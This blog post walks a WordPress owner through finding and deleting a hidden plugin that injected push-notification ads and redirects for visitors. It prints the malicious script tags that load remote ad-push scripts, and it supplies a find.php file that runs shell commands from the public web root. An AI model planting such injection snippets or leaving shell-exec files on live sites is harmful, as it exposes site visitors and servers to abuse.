How to Fix Unauthorized Push Notification and Redirection Malware on WordPress
Are you running a website on WordPress? And experiencing a lot of unauthorized ads, having explicit content on your website? Are these Ads also appearing in push notification on mobile devices? Are you getting redirected to unknown webpages from your website links? Then, my friend, you are a victim of a recently active malware that is spreading by anonymous sources. Today I am going to tell you how to fix Unauthorized Push Notification and redirection.
What it looks like?
Recently our website Swarna, The Sagi Girl, also became a victim of this malware. And I had no clue what it was and how it is happening. For one month, I have ignored this and later it became an embarrassing moment when one of my visitors told me about it. But two days ago, I was finally able to get hold of this malware and removed it completely, from my server. Here’s how this push notification looks like. Click on the pictures to enlarge them.
I wasn’t able to take screenshots from my desktop because it has nice Algorithm written that makes it hidden from Admins, if you don’t take any step in initial days, then you will never see these ads as admin.
But on initial days I inspected one of the push ad on my website. And I was fortunate and feel lucky that I did because after few days it will stopped showing up on my screen as my IP has been logged in the helper file. Only visitors were able to to see these ads. The inspected Ads had code similar to Code Snippet 1. You might be having different code but somewhat similar to this as this malware has spread with different names and slightly modifed code and url’s.
Code Snippet 1:
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3388587,document.body||document.documentElement)</script>
<script src="https://propu.sh/pfe/current/tag.min.js?z=3388595" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3388600" data-cfasync="false" async="async"></script>
Code Snippet 2:
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>
How this Malware works?
Like I previously said it has a really nice and simple algorithm written with around 400 lines of code in a single PHP file. As a whole, it is a standalone plugin that fetches Organic Ads from different Search Engines. At the same time, it will hide itself from Admin Dashboard and store every IP Address each Admin has logged in within a separate text file called admin_ips.txt.
Now this file will help this plugin to identify whether current visitor to your Website is a Admin or not. If not an Admin then it will display these Ads and place redirection on your whole website. These Ads are very embarrasing as well as very frustrating as they contains Articles related to money making tricks or Adult Content. If not treated in early days it will become very difficult to detect.
On the top to make the matter worse it has an auto update feature. It uses allow_url_fopen to auto update itself every time it has updated code available. So you can understand how important this malware needs to be contained and removed from your servers before it can create more havoc.
As you can see from above snippets that are only few lines from whole code, how malicious it can be.
How to fix unauthorized push notification and redirection malware from WordPress?
If you are still able to see this Ad on your desktop then right click on it and use inspect on any browser. In my case I use Mozilla Firefox so it never showed on this browser as I was logged in as Admin but initially it did sometimes came up on Chrome. If not appearing but it has appeared previously then you can use your mobile network to visit your website or use a VPN. Try to see what js script or code it has like I have provided above. Copy some part of the code and we will use this to search in the server.
In my case, I remembered “inpagepush.com” so I searched with this on my server for files containing this string. Now if you are using shared hosting you might not have full SSH access and you might not be able to search. In order to solve the search issue you need to create a PHP file or file with .php extension with any name. I used find.php and put the below code in the file and saved it in your public_html folder.
<?php
$command = "grep -ri 'inpagepush' ./*";
$output = shell_exec($command);
echo "$output";
echo "Grep job over.";
?>
In the above code you can replace inpagepush with the string you copied from inspecting the Ad. And to run this file just go to your browser and visit yourdomain/find.php. Dont forget to replace yourdomain with your home page url. What this file will do is search through your files and folders recursively to find any line containing the searched string. Once found it will show up in your page. Now you will be able to see the files containing this code/string along with the path.
In my case it was ccode.php and present in plugins folder along with admin_ips.txt. This is the file that causing all this commotion. You can open it go through it contents or yopu can just simply tell the file Bye Bye and permanently delete along with the admin_ip.txt file. In your case it might be present with some other name, other than code and in multiple directories. So you need to make sure all the path containing these files also get deleted.
Before deleting please make sure you are deleting the correct files. Not the files related to any specific plugin or core files. Don’t forget to take a Backup of your website and Database before attempting to do this.
Once you have deleted the files, you will able to see a notification like this on your Admin Dashboard. It means we have delete all the important file for this plugins to run but it is still registered in DB tables so WordPress Engine is unable to run this plugin. Good news for us!
Once you are done clearing up these files from search results. Now it’s time to clean your Database as well. Open phpMyAdmin and place that specific string in the Search and select all tables to search. It will show you all the tables where it has made footprints. In my case I used inpagepush and ccode to make sure my DB is cleaned.
Search String “inpagepush”
Search String “ccode”
As you can see it has affected many of my Database tables. In your case it might be different so try to search with all the possible keywords find more. And that will be all. Oh! One more thing don’t forget to clear your cache to vanquish last bits of this malware present on your website.
Also for additional security you can block all the URL’s present in the Ads to send and receive requests. After this incident I also changed my Database prefix.
Resources
Thanks Astra for Code Snippet 2. You can also check out the page where they have mentioned more tips to fix Unauthorized Push Notification and Redirection Malware. Also thanks to User Sri from Webmasters Stackexchange for the Searching in cpanel files code. If you want to read more about WordPress Security, I definitely recommend to read
FAQ My site was hacked
and Hardening WordPress
I hope if you are victim of this malware then this post about how to Fix Unauthorized Push Notification and Redirection Malware on WordPress, helped you. Let us know your thoughts in the comments below.
